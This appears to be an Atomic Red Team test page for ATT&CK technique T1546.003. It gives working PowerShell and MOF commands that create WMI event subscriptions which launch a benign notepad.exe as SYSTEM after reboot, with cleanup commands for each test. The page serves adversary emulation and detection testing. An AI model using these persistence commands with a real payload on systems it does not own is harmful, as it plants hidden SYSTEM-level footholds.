T1546.003
Event Triggered Execution: Windows Management Instrumentation Event Subscription
Description from ATT&CK
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015)
Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts – using
–into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)1
mofcomp.exe
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
Atomic Tests
Atomic Test #1 - Persistence via WMI Event Subscription - CommandLineEventConsumer
Run from an administrator powershell window. After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
Supported Platforms: windows
auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
$FilterToConsumerArgs = @{
Filter = [Ref] $Filter;
Consumer = [Ref] $Consumer;
}
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
Cleanup Commands:
1
2
3
4
5
6
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
Atomic Test #2 - Persistence via WMI Event Subscription - ActiveScriptEventConsumer
Run from an administrator powershell window. After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
https://gist.github.com/mgreen27/ef726db0baac5623dc7f76bfa0fc494c
Supported Platforms: windows
auto_generated_guid: fecd0dfd-fb55-45fa-a10b-6250272d0832
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments $FilterArgs
$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
ScriptingEngine='VBScript';
ScriptText='
Set objws = CreateObject("Wscript.Shell")
objws.Run "notepad.exe", 0, True
'}
$Consumer=Set-WmiInstance -Namespace "root\subscription" -Class ActiveScriptEventConsumer -Arguments $ConsumerArgs
$FilterToConsumerArgs = @{
Filter = $Filter;
Consumer = $Consumer;
}
$FilterToConsumerBinding = Set-WmiInstance -Namespace 'root/subscription' -Class '__FilterToConsumerBinding' -Arguments $FilterToConsumerArgs
Cleanup Commands:
1
2
3
4
5
6
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class ActiveScriptEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
Atomic Test #3 - Windows MOFComp.exe Load MOF File
The following Atomic will utilize MOFComp.exe to load a local MOF file. The Managed Object Format (MOF) compiler parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. To query for the class: gwmi __eventfilter -namespace root\subscription A successful execution will add the class to WMI root namespace. Reference: https://pentestlab.blog/2020/01/21/persistence-wmi-event-subscription/ and https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/.
Supported Platforms: windows
auto_generated_guid: 29786d7e-8916-4de6-9c55-be7b093b2706
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
mofcomp_path | Location of mofcomp.exe | string | c:\windows\system32\wbem\mofcomp.exe |
mof_file | Local location MOF file | string | PathToAtomicsFolder\T1546.003\src\T1546.003.mof |
Attack Commands: Run with powershell!
1
#{mofcomp_path} "#{mof_file}"
Cleanup Commands:
1
2
3
4
5
6
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam_consumer'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam_filter'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
Dependencies: Run with powershell!
Description: MofComp.exe must exist on disk at specified location (#{mofcomp_path})
Check Prereq Commands:
1
if (Test-Path "#{mofcomp_path}") { exit 0} else { exit 1}
Get Prereq Commands:
1
Validate MOFComp.exe is on disk somewhere and update input argument.
Description: MofComp.exe must exist on disk at specified location (#{mof_file})
Check Prereq Commands:
1
if (Test-Path "#{mof_file}") { exit 0} else { exit 1}
Get Prereq Commands:
1
2
New-Item -Type Directory (split-path "#{mof_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.003/src/T1546.003.mof" -OutFile "#{mof_file}"